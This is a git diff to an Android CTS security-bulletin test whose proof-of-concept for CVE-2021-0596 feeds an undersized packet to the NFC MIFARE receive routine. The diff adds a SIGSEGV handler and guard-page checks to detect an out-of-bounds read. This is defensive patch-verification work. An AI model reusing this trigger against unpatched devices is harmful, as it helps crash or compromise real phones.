diff options
Diffstat (limited to 'hostsidetests/securitybulletin/securityPatch/CVE-2021-0596/poc.cpp')
-rw-r--r-- | hostsidetests/securitybulletin/securityPatch/CVE-2021-0596/poc.cpp | 37 |
1 files changed, 33 insertions, 4 deletions
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0596/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0596/poc.cpp index 9b250044e38..3b1a58014a3 100644 --- a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0596/poc.cpp +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0596/poc.cpp @@ -15,21 +15,50 @@ * */ +#include <unistd.h> #include "phNxpExtns_MifareStd.h" +#include "../includes/common.h" +#include "../includes/memutils.h" +char enable_selective_overload = ENABLE_NONE; +char *vulnPtr = nullptr; +bool testInProgress = false; +struct sigaction new_action, old_action; +void sigsegv_handler(int signum, siginfo_t *info, void* context) { + if (testInProgress && info->si_signo == SIGSEGV) { + size_t pageSize = getpagesize(); + if (pageSize) { + char *vulnPtrGuardPage = (char *) ((size_t) vulnPtr & PAGE_MASK) - pageSize; + char *faultPage = (char *) ((size_t) info->si_addr & PAGE_MASK); + if (faultPage == vulnPtrGuardPage) { + (*old_action.sa_sigaction)(signum, info, context); + return; + } + } + } + _exit(EXIT_FAILURE); +} uint8_t NFC_GetNCIVersion() { return NCI_VERSION_2_0; } int main() { - uint8_t *buffer = (uint8_t*) malloc(16 * sizeof(uint8_t)); - if (buffer == nullptr) { - return EXIT_FAILURE; - } + sigemptyset(&new_action.sa_mask); + new_action.sa_flags = SA_SIGINFO; + new_action.sa_sigaction = sigsegv_handler; + sigaction(SIGSEGV, &new_action, &old_action); + enable_selective_overload = ENABLE_MEMALIGN_CHECK; + uint8_t *buffer = (uint8_t*) memalign(16, 16 * sizeof(uint8_t)); + enable_selective_overload = ENABLE_FREE_CHECK | ENABLE_REALLOC_CHECK; + FAIL_CHECK(buffer); + + vulnPtr = (char *) buffer; uint8_t bufferSize = 1; buffer[0] = 0x10; phNxpExtns_MfcModuleInit(); + testInProgress = true; Mfc_RecvPacket(buffer, bufferSize); + testInProgress = false; free(buffer); return EXIT_SUCCESS; } |